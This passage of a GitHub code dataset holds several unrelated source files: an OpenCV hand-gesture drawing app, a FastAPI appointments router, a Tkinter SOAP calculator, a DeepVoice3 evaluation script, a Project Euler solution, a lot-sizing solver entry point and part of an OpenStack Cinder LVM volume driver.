run()\n","repo_name":"eljost/pysisyphus","sub_path":"deprecated/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":30386,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"43"} +{"seq_id":"39154029717","text":"import cv2\r\nimport numpy as np\r\nimport time\r\nimport os\r\nimport HandTrackingModule as htm\r\n\r\nfolderPath = \"Header\"\r\nmyList = 
os.listdir(folderPath)\r\n# print(myList)\r\noverlayList = []\r\nfor imPath in myList:\r\n image = cv2.imread(f'{folderPath}/{imPath}')\r\n overlayList.append(image)\r\n# print(len(overlayList))\r\n\r\ndetector = htm.handDetector(detectionCon=0.75, maxHands=1)\r\nimgCanvas = np.zeros((720, 1280, 3), np.uint8)\r\n\r\nclass VideoCamera2(object):\r\n def __init__(self):\r\n # capturing video\r\n self.wCam, self.hCam = 640, 480\r\n self.cap = cv2.VideoCapture(1)\r\n self.cap.set(3, self.wCam)\r\n self.cap.set(4, self.hCam)\r\n self.pTime = 0\r\n self.header = overlayList[0]\r\n self.drawColor = (255, 0, 255)\r\n self.xp, self.yp = 0, 0\r\n self.brushThickness = 15\r\n self.eraserThickness = 100\r\n\r\n def __del__(self):\r\n pass\r\n # releasing camera\r\n self.cap.release()\r\n\r\n def get_frame(self):\r\n # extracting frames\r\n\r\n # 1. Import image\r\n success, img = self.cap.read()\r\n img = cv2.flip(img, 1)\r\n img = cv2.resize(img, (1280, 720))\r\n # print(\"1\", img.shape)\r\n # print(\"2\", imgCanvas.shape)\r\n\r\n # 2. Find Hand Landmarks\r\n img = detector.findHands(img)\r\n lmList, bbox = detector.findPosition(img, draw=False)\r\n\r\n if len(lmList) == 0:\r\n self.xp, self.yp = 0, 0\r\n\r\n if len(lmList) != 0:\r\n # print(lmList)\r\n\r\n # tip of index and middle fingers\r\n x1, y1 = lmList[8][1:]\r\n x2, y2 = lmList[12][1:]\r\n\r\n # 3. Check which fingers are up\r\n fingers = detector.fingersUp()\r\n # print(fingers)\r\n\r\n # 4. If Selection Mode - Two finger are up\r\n if fingers[1] and fingers[2]:\r\n self.xp, self.yp = 0, 0\r\n # print(\"Selection Mode\")\r\n # # Checking for the click\r\n if y1 < 125:\r\n if 250 < x1 < 450:\r\n self.header = overlayList[0]\r\n self.drawColor = (255, 0, 255)\r\n elif 550 < x1 < 750:\r\n self.header = overlayList[1]\r\n self.drawColor = (255, 0, 0)\r\n elif 800 < x1 < 950:\r\n self.header = overlayList[2]\r\n self.drawColor = (0, 255, 0)\r\n elif 1050 < x1 < 1200:\r\n self.header = overlayList[3]\r\n self.drawColor = (0, 0, 0)\r\n cv2.rectangle(img, (x1, y1 - 25), (x2, y2 + 25), self.drawColor, cv2.FILLED)\r\n\r\n # 5. 
If Drawing Mode - Index finger is up\r\n if fingers[1] and fingers[2] == False:\r\n cv2.circle(img, (x1, y1), 15, self.drawColor, cv2.FILLED)\r\n # print(\"Drawing Mode\")\r\n if self.xp == 0 and self.yp == 0:\r\n self.xp, self.yp = x1, y1\r\n\r\n if self.drawColor == (0, 0, 0):\r\n cv2.line(img, (self.xp, self.yp), (x1, y1), self.drawColor, self.eraserThickness)\r\n cv2.line(imgCanvas, (self.xp, self.yp), (x1, y1), self.drawColor, self.eraserThickness)\r\n else:\r\n cv2.line(img, (self.xp, self.yp), (x1, y1), self.drawColor, self.brushThickness)\r\n cv2.line(imgCanvas, (self.xp, self.yp), (x1, y1), self.drawColor, self.brushThickness)\r\n\r\n self.xp, self.yp = x1, y1\r\n\r\n imgGray = cv2.cvtColor(imgCanvas, cv2.COLOR_BGR2GRAY)\r\n _, imgThres = cv2.threshold(imgGray, 10, 255, cv2.THRESH_BINARY_INV)\r\n imgInv = cv2.cvtColor(imgThres, cv2.COLOR_GRAY2BGR)\r\n img = cv2.bitwise_and(img, imgInv)\r\n img = cv2.bitwise_or(img, imgCanvas)\r\n\r\n # Setting the header image\r\n img[0:125, 0:1280] = self.header\r\n # img = cv2.addWeighted(img, 0.5, imgCanvas, 0.5, 0)\r\n # cv2.imshow(\"Image\", img)\r\n # cv2.imshow(\"Canvas\", imgCanvas)\r\n # cv2.imshow(\"Gray\", imgGray)\r\n # cv2.imshow(\"Thres\", imgThres)\r\n # cv2.imshow(\"Inv\", imgInv)\r\n # cv2.waitKey(1)\r\n\r\n ret, jpeg = cv2.imencode('.jpg', img)\r\n return jpeg.tobytes()","repo_name":"desairaj414/Computer-Controlling-Using-OpenCV","sub_path":"camera2.py","file_name":"camera2.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14304164833","text":"from fastapi import APIRouter, Depends\nfrom typing import Union, List, Dict\nfrom authenticator import authenticator\nfrom queries.appointments import (\n AppointmentIn,\n AppointmentRepository,\n AppointmentOut,\n Error,\n)\nfrom queries.jotters import JottersRepository\n\n\nrouter = APIRouter()\n\n\n@router.post(\"/appointments\", response_model=Union[AppointmentOut, Error])\ndef create_appointment(\n appointment: AppointmentIn,\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n jotter_repo: JottersRepository = Depends(),\n):\n appointment.user_id = user_data[\"id\"]\n current_balance = jotter_repo.get_one(user_data[\"id\"]).balance\n if current_balance < 10:\n return Error(\n message=\"Your balance is insufficient to make an appointment\"\n )\n result = repo.create(appointment)\n jotter_repo.change_balance(user_data[\"id\"], -10)\n return result\n\n\n@router.get(\"/appointments\", response_model=Union[List[AppointmentOut], Error])\ndef get_all_appointments_for_user(\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n):\n user_id = user_data[\"id\"]\n return repo.get_all_appointments_for_user(user_id)\n\n\n@router.get(\"/therapistappointments\",\n response_model=Union[List[AppointmentOut], Error])\ndef get_all_appointments_for_therapist(\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n):\n therapist_id = user_data[\"id\"]\n return repo.get_all_appointments_for_therapist(therapist_id)\n\n\n@router.delete(\n \"/appointments/{appointment_id}\",\n response_model=bool,\n)\ndef delete_appointment(\n appointment_id: int,\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n) -> bool:\n return 
repo.delete_appointment(appointment_id)\n\n\n@router.get(\n \"/appointments/{appointment_id}\",\n response_model=Union[Error, AppointmentOut],\n)\ndef get_one_appointment(\n appointment_id: int,\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n) -> Union[AppointmentOut, Error]:\n return repo.get_one_appointment(appointment_id)\n\n\n@router.put(\n \"/appointments/{appointment_id}\",\n response_model=Union[AppointmentOut, Error],\n)\ndef update_appointment(\n appointment_id: int,\n appointment: AppointmentIn,\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n) -> Union[Error, AppointmentOut]:\n return repo.update_appointment(appointment_id, appointment)\n","repo_name":"drceran/feel-better","sub_path":"therapy/routers/appointments.py","file_name":"appointments.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37031060200","text":"#In data base we are able to perform CRUD operations which are:\n#Create record\n#Read record\n#Update record\n#Delete record\n\n#In the databse operation ,add find user to enable search for user\nimport os #os allows us to delete a file in the os\n\nuser_db_path='data/user_record/'\n\n\ndef create(accountNumber,userDetails):\n\n completion_state=False\n\n try:\n f=open(user_db_path + str(accountNumber)+ '.txt','x')\n \n except FileExistsError:\n print('User already exist')\n #delete the already created file, and print out error, then return false\n #check content of file before deleting\n\n # delete(accountNumber)\n\n else: \n f.write(str(userDetails))\n completion_state=True\n\n finally:\n f.close()\n return completion_state\n\n\n return completion_state\n\n # create a file\n #name of the file would be account.txt\n #add the user details to the file\n #return true \n #if saving to file fails, then delete created file\n\ndef read(user_account_number):\n print('Read user account number')\n #find user with account number\n #fetch content of the file \n\ndef update(user_account_number):\n print('update user record')\n #find user with account number \n #fetch the content of the file\n #update the content of the file\n #save the file \n #return true\n\n\ndef delete(user_account_number):\n \n is_delete_successful=False\n\n if os.path.exists(user_db_path + str(user_account_number)+'.txt'):\n\n try:\n\n os.remove(user_db_path+ str(user_account_number)+'.txt')\n is_delete_successful=True\n\n except FileNotFoundError:\n print('User not found')\n\n finally:\n \n return is_delete_successful\n\n #find user with account number \n #delete the user recod (file)\n #return true \n\ndef find(user_account_number):\n print('find user')\n # find user record in the data folder \n\nprint(delete(3652386601))\n\n","repo_name":"rossi2018/Zuri-Training-2021","sub_path":"Python_clases/31File_system_database_project2_Delete_user/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27465775309","text":"from tkinter import *\nfrom zeep import Client\n\n\n # TODO : Fix equal Button\n # TODO : Fix button_add methode \n # TODO : Improve UI\n \n \n# ! 
Using Zeep Module to connect to our wsdl file in localhost\nclient = Client(wsdl='http://localhost:8000/calculator/?wsdl')\n\n# * The operands and the pending operation are module-level globals;\n# * they start out as None until the user types something\nfirst_int = None\nsecond_int = None\nglobal_operation = None\n\n\n# * This method clears the Entry data and resets the global variables to None\ndef clear_button():\n    global first_int, second_int, global_operation\n    first_int = None\n    second_int = None\n    global_operation = None\n    e.delete(0,\"end\")\n\n\ndef button_add(number):\n    e.insert(\"end\",number)\n\n\n\n# * this method stores the first number and clears the entry so we make space for the second number\ndef button_operation(operation):\n    input1 = e.get()\n    num = input1\n    if num != \"\" :\n        global global_operation \n        global first_int\n        \n        first_int = int(num)\n        global_operation = operation\n        e.delete(0,'end')\n    else:\n        pass\n\n# * Defining the equal method : \n# * this method will use the wsdl file from localhost to perform the chosen operation\n# ! Check out this repo to access SOAP Service : https://github.com/qbdq/Calculator_soap_service_django\n\ndef equal_operation():\n    input2 = e.get()\n    num2 = input2\n    \n    if num2 != \"\":\n        global second_int\n        second_int = int(num2)\n        if global_operation==\"+\":\n            result = client.service.sum(first_int,second_int)\n        elif global_operation==\"-\":\n            result = client.service.minus(first_int,second_int)\n        elif global_operation == \"*\":\n            result = client.service.prod(first_int,second_int)\n        elif global_operation ==\"/\":\n            result = client.service.div(first_int,second_int)\n        else:\n            # ! No operation has been selected yet, so there is nothing to compute\n            return\n        \n        e.delete(0, 'end')\n        e.insert(0,result)\n    else:\n        e.delete(0,\"end\")\n        if first_int is not None:\n            e.insert(0,first_int)\n    \n    \n\n\n\n# * Creating our root frame and titling it \nroot = Tk()\nroot.title(\"Calculator using SOAP Services\")\n\ne = Entry(root,width=40, borderwidth=5)\ne.grid(row=0 , column = 0, columnspan=4, padx=5, pady=5)\n\n# Defining buttons\nbutton_1 = Button(root , text = \"1\" ,padx =40 , pady= 20 , command =lambda :button_add(1))\nbutton_2 = Button(root , text = \"2\" ,padx =40 , pady= 20 , command =lambda :button_add(2))\nbutton_3 = Button(root , text = \"3\" ,padx =40 , pady= 20 , command =lambda :button_add(3))\nbutton_4 = Button(root , text = \"4\" ,padx =40 , pady= 20 , command =lambda :button_add(4))\nbutton_5 = Button(root , text = \"5\" ,padx =40 , pady= 20 , command =lambda :button_add(5))\nbutton_6 = Button(root , text = \"6\" ,padx =40 , pady= 20 , command =lambda :button_add(6))\nbutton_7 = Button(root , text = \"7\" ,padx =40 , pady= 20 , command =lambda :button_add(7))\nbutton_8 = Button(root , text = \"8\" ,padx =40 , pady= 20 , command =lambda :button_add(8))\nbutton_9 = Button(root , text = \"9\" ,padx =40 , pady= 20 , command =lambda :button_add(9))\nbutton_0 = Button(root , text = \"0\" ,padx =40 , pady= 20 , command =lambda :button_add(0))\n\nbutton_clear = Button(root , text = \"CLEAR\" ,padx =26 , pady= 20 , command =lambda :clear_button())\nbutton_addition = Button(root , text = \"+\" ,padx =38 , pady= 20 , command =lambda :button_operation('+'))\nbutton_min = Button(root , text = \"-\" ,padx =38 , pady= 20 , command =lambda :button_operation('-'))\nbutton_prod = Button(root , text = \"*\" ,padx =38 , pady= 20 , command =lambda :button_operation('*'))\nbutton_div = Button(root , text = \"/\" ,padx =38 , pady= 20 , command =lambda :button_operation('/'))\nbutton_equal = Button(root , text = \"=\" ,padx =39 , pady= 20 , command =lambda :equal_operation())\n\n\n\n# * Adding buttons to the screen \n\nbutton_1.grid (column =0 , row = 3 )\nbutton_2.grid (column =1 , row = 3 )\nbutton_3.grid (column =2 , row = 3 )\nbutton_addition.grid (column =3 , row = 
3 )\n\nbutton_4.grid (column =0 , row = 2 )\nbutton_5.grid (column =1 , row = 2 )\nbutton_6.grid (column =2 , row = 2 )\nbutton_min.grid (column =3 , row = 2 )\n\nbutton_7.grid (column =0 , row = 1 )\nbutton_8.grid (column =1 , row = 1 )\nbutton_9.grid (column =2 , row = 1 )\nbutton_div.grid (column =3 , row = 1)\n\nbutton_clear.grid (column =0 , row = 4)\nbutton_0.grid (column =1 , row = 4)\nbutton_equal.grid (column =2 , row = 4)\nbutton_prod.grid (column =3 , row = 4)\n\n\nroot.mainloop()\n\n\n\n","repo_name":"qbdq/Calculator_Tkinter","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"6104802730","text":"import sys\n\nimport torch\nimport numpy as np\nfrom tqdm import trange\n\nfrom module import DeepVoice3\nfrom utils import griffinlim_collate_fn, \\\n preprocess_with_multi_process, \\\n init_worker_fn, \\\n NumpyDataset, \\\n load_model\nfrom hyperparams import HyperParams as hp\nfrom waveutils import magnitude_db_save_as_wav\n\nfrom torch.utils import data\n\n\ndevice = \"cpu\"\n\n\ndef evaluate(sentence: str, path=None):\n tts = DeepVoice3()\n tts = load_model(tts, path=path).to(device).eval()\n\n input = torch.tensor([[hp.vocab_to_id[c]\n for c in sentence\n if c in hp.id_to_vocab]]).to(device)\n\n decoder_init_state = torch.zeros(\n (1, hp.reduction_factor, hp.mel_bands)\n ).to(device)\n\n with torch.no_grad():\n _, mag, _, _ = tts(input=input,\n init_state=decoder_init_state)\n mag = mag.squeeze(0).detach().cpu().numpy()\n magnitude_db_save_as_wav(mag, \"/tmp/hoge.wav\")\n\n\ndef test():\n dataset = NumpyDataset(metadata=\"./../dataset/LJSpeech-1.1/metadata.csv\",\n root=\"./../dataset/LJSpeech-1.1/preprocessed/\",\n vocab_to_id=hp.vocab_to_id,\n id_to_vocab=hp.id_to_vocab)\n train_dataloader = data.DataLoader(dataset,\n batch_size=1,\n shuffle=True,\n num_workers=1,\n # pin_memory=True,\n collate_fn=griffinlim_collate_fn,\n worker_init_fn=init_worker_fn)\n tts = DeepVoice3()\n tts = load_model(tts).to(device).eval()\n for label_mel_db, label_mag_db, label_done, frame_mask, \\\n script, script_mask in train_dataloader:\n zeros = torch.zeros(\n (label_mel_db.size(0), hp.reduction_factor, hp.mel_bands)\n )\n label_mel_db = torch.cat([zeros, label_mel_db], dim=1).to(device)\n frame_mask = frame_mask.unsqueeze(2).to(device)\n script_mask = script_mask.unsqueeze(2).to(device)\n mel, mag, done, attn = tts(\n input=script.to(device),\n decoder_input=label_mel_db[:, :-hp.reduction_factor],\n frame_mask=frame_mask,\n script_mask=script_mask)\n # from matplotlib import pyplot as plt\n # mel_ = mel.squeeze(0).detach().numpy()\n # plt.imshow(mel_.T)\n # plt.show()\n mag = mag.squeeze(0).detach().cpu().numpy()\n magnitude_db_save_as_wav(mag, \"/tmp/hoge.wav\")\n break\n\nif __name__ == \"__main__\":\n hp.mode = \"generate\"\n if len(sys.argv) > 1:\n path = sys.argv[1]\n while True:\n evaluate(input(), path)\n else:\n path=None\n evaluate(\"there's a way to measure the acute emotional intelligence that has never gone out of style.\", path)\n # evaluate(\"icassp stands for the international conference on acoustics, speech and signal processing.\", path)\n # evaluate(\"printing, in the only sense with which we are at present concerned, differs from most if not from all the arts and crafts represented in the Exhibition.\")\n # 
test()\n","repo_name":"tsubota-kouga/DeepVoice3","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"18030912235","text":"\"\"\"\nThe number, 197, is called a circular prime because all rotations of the digits: 197, 971, and 719, are themselves prime\n\nThere are thirteen such primes below 100: 2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.\n\nHow many circular primes are there below one million?\n\"\"\"\nimport numpy as np\n\n\ndef prime(n):\n    if n in allprimes:\n        return True\n    for i in range(2, n // 2 + 1):\n        if n % i == 0:\n            return False\n    return True\n\n\ndef listtonum(lst):\n    times = 0\n    while lst[0] == 0:\n        times += 1\n        lst.pop(0)\n    num = 0\n    for i in range(len(lst)):\n        num += lst[i] * (10 ** (len(lst) - i - 1))\n    return num * (10 ** times)\n\n\ndef shift(n: int):\n    \"\"\"\n    rotates the digits of a number (the last digit moves to the front)\n    :param n: the number\n    :return: the rotated number\n    \"\"\"\n    n = list(map(int, str(n)))\n    n.insert(0, n.pop())\n    return listtonum(n)\n\n\ndef primesfrom2to(n):\n    # numpy sieve over numbers coprime to 2 and 3; returns an array of primes below n\n    sieve = np.ones(n // 3 + (n % 6 == 2), dtype=bool)\n    for i in range(1, int(n ** 0.5) // 3 + 1):\n        if sieve[i]:\n            k = 3 * i + 1 | 1\n            sieve[k * k // 3::2 * k] = False\n            sieve[k * (k - 2 * (i & 1) + 4) // 3::2 * k] = False\n    return np.r_[2, 3, ((3 * np.nonzero(sieve)[0][1:] + 1) | 1)]\n\n\ndef checkallshifts(n):\n    for i in range(len(str(n)) - 1):\n        n = shift(n)\n        if not prime(n):\n            return 0\n    return 1\n\n\ncount = 0\n# the problem asks for circular primes below one million\nallprimes = primesfrom2to(10 ** 6)\nfor primes in allprimes:\n    count += checkallshifts(primes)\nprint(count)\n","repo_name":"yavidor/EulerProject","sub_path":"Problem35.py","file_name":"Problem35.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20778992111","text":"#!/usr/bin/env python3\n\nimport logging\nfrom argparse import ArgumentParser\nfrom enum import Enum\n\nfrom lot_sizing.model import MipModel, Input\n\n\nclass Linearisation(Enum):\n    COMPACT = 1  # based on Liberti's linearisation\n    EXTENDED = 2  # based on network flow formulation\n    SIMPLE = 3  # based on Glover-Woolsey linearisation\n\n\nmodule_logger = logging.getLogger('main')\n\ncmd_parser = ArgumentParser(\n    description='Integer programming formulations for the discrete, single-machine, multi-item, single-level lot sizing problem.')\ncmd_parser.add_argument('-f', '--file', metavar=\"input_file\", type=str,\n                        help='File containing the input data',\n                        required=True)\ncmd_parser.add_argument('--lin', type=int, choices=range(1, 4), required=True,\n                        help='Specifies which linearisation should be used: 1-compact, 2-extended, 3-glover_woolsey')\ncmd_parser.add_argument('-s', '--solver', type=str, default='SCIP',\n                        help='Specifies the solver used by ortools. 
Default is SCIP.')\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n cmd_args = cmd_parser.parse_args()\n prob_input = Input.read_file(cmd_args.file)\n linearisation = Linearisation(cmd_args.lin)\n if linearisation == Linearisation.COMPACT:\n mip_model = MipModel.build_liberti_formulation(prob_input, cmd_args.solver)\n elif linearisation == Linearisation.EXTENDED:\n mip_model = MipModel.build_network_flow_formulation(prob_input, cmd_args.solver)\n elif linearisation == Linearisation.SIMPLE:\n mip_model = MipModel.build_glover_woolsey_formulation(prob_input, cmd_args.solver)\n else:\n raise RuntimeError('Unexpected linearisation.')\n schedule, cost = mip_model.compute_optimal_schedule()\n module_logger.info(f'Computed schedule: {schedule}')\n module_logger.info(f'Objective value: {cost}')\n","repo_name":"asbestian/lot_sizing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"14848731121","text":"import math\nimport os\nimport socket\n\nfrom oslo.config import cfg\n\nfrom cinder.brick import exception as brick_exception\nfrom cinder.brick.local_dev import lvm as lvm\nfrom cinder import exception\nfrom cinder.image import image_utils\nfrom cinder.openstack.common import fileutils\nfrom cinder.openstack.common import log as logging\nfrom cinder.openstack.common import processutils\nfrom cinder import units\nfrom cinder import utils\nfrom cinder.volume import driver\nfrom cinder.volume import utils as volutils\n\nLOG = logging.getLogger(__name__)\n\nvolume_opts = [\n cfg.StrOpt('volume_group',\n default='cinder-volumes',\n help='Name for the VG that will contain exported volumes'),\n cfg.IntOpt('lvm_mirrors',\n default=0,\n help='If set, create lvms with multiple mirrors. 
Note that '\n 'this requires lvm_mirrors + 2 pvs with available space'),\n cfg.StrOpt('lvm_type',\n default='default',\n help='Type of LVM volumes to deploy; (default or thin)'),\n]\n\nCONF = cfg.CONF\nCONF.register_opts(volume_opts)\n\n\nclass LVMVolumeDriver(driver.VolumeDriver):\n \"\"\"Executes commands relating to Volumes.\"\"\"\n\n VERSION = '2.0.0'\n\n def __init__(self, vg_obj=None, *args, **kwargs):\n super(LVMVolumeDriver, self).__init__(*args, **kwargs)\n self.configuration.append_config_values(volume_opts)\n self.hostname = socket.gethostname()\n self.vg = vg_obj\n self.backend_name =\\\n self.configuration.safe_get('volume_backend_name') or 'LVM'\n self.protocol = 'local'\n\n def set_execute(self, execute):\n self._execute = execute\n\n def check_for_setup_error(self):\n \"\"\"Verify that requirements are in place to use LVM driver.\"\"\"\n if self.vg is None:\n root_helper = utils.get_root_helper()\n try:\n self.vg = lvm.LVM(self.configuration.volume_group,\n root_helper,\n lvm_type=self.configuration.lvm_type,\n executor=self._execute)\n except brick_exception.VolumeGroupNotFound:\n message = (\"Volume Group %s does not exist\" %\n self.configuration.volume_group)\n raise exception.VolumeBackendAPIException(data=message)\n\n vg_list = volutils.get_all_volume_groups(\n self.configuration.volume_group)\n vg_dict = \\\n (vg for vg in vg_list if vg['name'] == self.vg.vg_name).next()\n if vg_dict is None:\n message = (\"Volume Group %s does not exist\" %\n self.configuration.volume_group)\n raise exception.VolumeBackendAPIException(data=message)\n\n if self.configuration.lvm_type == 'thin':\n # Specific checks for using Thin provisioned LV's\n if not volutils.supports_thin_provisioning():\n message = (\"Thin provisioning not supported \"\n \"on this version of LVM.\")\n raise exception.VolumeBackendAPIException(data=message)\n\n pool_name = \"%s-pool\" % self.configuration.volume_group\n if self.vg.get_volume(pool_name) is None:\n try:\n self.vg.create_thin_pool(pool_name)\n except processutils.ProcessExecutionError as exc:\n exception_message = (\"Failed to create thin pool, \"\n \"error message was: %s\"\n % exc.stderr)\n raise exception.VolumeBackendAPIException(\n data=exception_message)\n\n def _sizestr(self, size_in_g):\n if int(size_in_g) == 0:\n return '100m'\n return '%sg' % size_in_g\n\n def _volume_not_present(self, volume_name):\n return self.vg.get_volume(volume_name) is None\n\n def _delete_volume(self, volume, is_snapshot=False):\n \"\"\"Deletes a logical volume.\"\"\"\n if self.configuration.volume_clear != 'none' and \\\n self.configuration.lvm_type != 'thin':\n self._clear_volume(volume, is_snapshot)\n\n name = volume['name']\n if is_snapshot:\n name = self._escape_snapshot(volume['name'])\n self.vg.delete(name)\n\n def _clear_volume(self, volume, is_snapshot=False):\n # zero out old volumes to prevent data leaking between users\n # TODO(ja): reclaiming space should be done lazy and low priority\n if is_snapshot:\n # if the volume to be cleared is a snapshot of another volume\n # we need to clear out the volume using the -cow instead of the\n # directly volume path. 
We need to skip this if we are using\n # thin provisioned LVs.\n # bug# lp1191812\n dev_path = self.local_path(volume) + \"-cow\"\n else:\n dev_path = self.local_path(volume)\n\n # TODO(jdg): Maybe we could optimize this for snaps by looking at\n # the cow table and only overwriting what's necessary?\n # for now we're still skipping on snaps due to hang issue\n if not os.path.exists(dev_path):\n msg = (_('Volume device file path %s does not exist.')\n % dev_path)\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n size_in_g = volume.get('size', volume.get('volume_size', None))\n if size_in_g is None:\n msg = (_(\"Size for volume: %s not found, \"\n \"cannot secure delete.\") % volume['id'])\n LOG.error(msg)\n raise exception.InvalidParameterValue(msg)\n\n # clear_volume expects sizes in MiB, we store integer GiB\n # be sure to convert before passing in\n vol_sz_in_meg = size_in_g * units.KiB\n\n volutils.clear_volume(\n vol_sz_in_meg, dev_path,\n volume_clear=self.configuration.volume_clear,\n volume_clear_size=self.configuration.volume_clear_size)\n\n def _escape_snapshot(self, snapshot_name):\n # Linux LVM reserves name that starts with snapshot, so that\n # such volume name can't be created. Mangle it.\n if not snapshot_name.startswith('snapshot'):\n return snapshot_name\n return '_' + snapshot_name\n\n def _create_volume(self, name, size, lvm_type, mirror_count, vg=None):\n vg_ref = self.vg\n if vg is not None:\n vg_ref = vg\n\n vg_ref.create_volume(name, size, lvm_type, mirror_count)\n\n def create_volume(self, volume):\n \"\"\"Creates a logical volume.\"\"\"\n mirror_count = 0\n if self.configuration.lvm_mirrors:\n mirror_count = self.configuration.lvm_mirrors\n\n self._create_volume(volume['name'],\n self._sizestr(volume['size']),\n self.configuration.lvm_type,\n mirror_count)\n\n def create_volume_from_snapshot(self, volume, snapshot):\n \"\"\"Creates a volume from a snapshot.\"\"\"\n self._create_volume(volume['name'],\n self._sizestr(volume['size']),\n self.configuration.lvm_type,\n self.configuration.lvm_mirrors)\n\n # Some configurations of LVM do not automatically activate\n # ThinLVM snapshot LVs.\n self.vg.activate_lv(snapshot['name'], is_snapshot=True)\n\n # copy_volume expects sizes in MiB, we store integer GiB\n # be sure to convert before passing in\n volutils.copy_volume(self.local_path(snapshot),\n self.local_path(volume),\n snapshot['volume_size'] * units.KiB,\n self.configuration.volume_dd_blocksize,\n execute=self._execute)\n\n def delete_volume(self, volume):\n \"\"\"Deletes a logical volume.\"\"\"\n\n # NOTE(jdg): We don't need to explicitly call\n # remove export here because we already did it\n # in the manager before we got here.\n\n if self._volume_not_present(volume['name']):\n # If the volume isn't present, then don't attempt to delete\n return True\n\n if self.vg.lv_has_snapshot(volume['name']):\n LOG.error(_('Unabled to delete due to existing snapshot '\n 'for volume: %s') % volume['name'])\n raise exception.VolumeIsBusy(volume_name=volume['name'])\n\n self._delete_volume(volume)\n\n def create_snapshot(self, snapshot):\n \"\"\"Creates a snapshot.\"\"\"\n\n self.vg.create_lv_snapshot(self._escape_snapshot(snapshot['name']),\n snapshot['volume_name'],\n self.configuration.lvm_type)\n\n def delete_snapshot(self, snapshot):\n \"\"\"Deletes a snapshot.\"\"\"\n if self._volume_not_present(self._escape_snapshot(snapshot['name'])):\n # If the snapshot isn't present, then don't attempt to delete\n LOG.warning(_(\"snapshot: %s not found, \"\n 
\"skipping delete operations\") % snapshot['name'])\n return True\n\n # TODO(yamahata): zeroing out the whole snapshot triggers COW.\n # it's quite slow.\n self._delete_volume(snapshot, is_snapshot=True)\n\n def local_path(self, volume, vg=None):\n if vg is None:\n vg = self.configuration.volume_group\n # NOTE(vish): stops deprecation warning\n escaped_group = vg.replace('-', '--')\n escaped_name = self._escape_snapshot(volume['name']).replace('-', '--')\n return \"/dev/mapper/%s-%s\" % (escaped_group, escaped_name)\n\n def copy_image_to_volume(self, context, volume, image_service, image_id):\n \"\"\"Fetch the image from image_service and write it to the volume.\"\"\"\n image_utils.fetch_to_raw(context,\n image_service,\n image_id,\n self.local_path(volume),\n self.configuration.volume_dd_blocksize,\n size=volume['size'])\n\n def copy_volume_to_image(self, context, volume, image_service, image_meta):\n \"\"\"Copy the volume to the specified image.\"\"\"\n image_utils.upload_volume(context,\n image_service,\n image_meta,\n self.local_path(volume))\n\n def create_cloned_volume(self, volume, src_vref):\n \"\"\"Creates a clone of the specified volume.\"\"\"\n\n mirror_count = 0\n if self.configuration.lvm_mirrors:\n mirror_count = self.configuration.lvm_mirrors\n LOG.info(_('Creating clone of volume: %s') % src_vref['id'])\n volume_name = src_vref['name']\n temp_id = 'tmp-snap-%s' % volume['id']\n temp_snapshot = {'volume_name': volume_name,\n 'size': src_vref['size'],\n 'volume_size': src_vref['size'],\n 'name': 'clone-snap-%s' % volume['id'],\n 'id': temp_id}\n\n self.create_snapshot(temp_snapshot)\n\n # copy_volume expects sizes in MiB, we store integer GiB\n # be sure to convert before passing in\n try:\n self._create_volume(volume['name'],\n self._sizestr(volume['size']),\n self.configuration.lvm_type,\n mirror_count)\n\n self.vg.activate_lv(temp_snapshot['name'], is_snapshot=True)\n\n volutils.copy_volume(\n self.local_path(temp_snapshot),\n self.local_path(volume),\n src_vref['size'] * units.KiB,\n self.configuration.volume_dd_blocksize,\n execute=self._execute)\n finally:\n self.delete_snapshot(temp_snapshot)\n\n def clone_image(self, volume, image_location, image_id, image_meta):\n return None, False\n\n def backup_volume(self, context, backup, backup_service):\n \"\"\"Create a new backup from an existing volume.\"\"\"\n volume = self.db.volume_get(context, backup['volume_id'])\n volume_path = self.local_path(volume)\n with utils.temporary_chown(volume_path):\n with fileutils.file_open(volume_path) as volume_file:\n backup_service.backup(backup, volume_file)\n\n def restore_backup(self, context, backup, volume, backup_service):\n \"\"\"Restore an existing backup to a new or existing volume.\"\"\"\n volume_path = self.local_path(volume)\n with utils.temporary_chown(volume_path):\n with fileutils.file_open(volume_path, 'wb') as volume_file:\n backup_service.restore(backup, volume['id'], volume_file)\n\n def get_volume_stats(self, refresh=False):\n \"\"\"Get volume status.\n\n If 'refresh' is True, run update the stats first.\n \"\"\"\n\n if refresh:\n self._update_volume_stats()\n\n return self._stats\n\n def _update_volume_stats(self):\n \"\"\"Retrieve stats info from volume group.\"\"\"\n\n LOG.debug(_(\"Updating volume stats\"))\n if self.vg is None:\n LOG.warning(_('Unable to update stats on non-initialized '\n 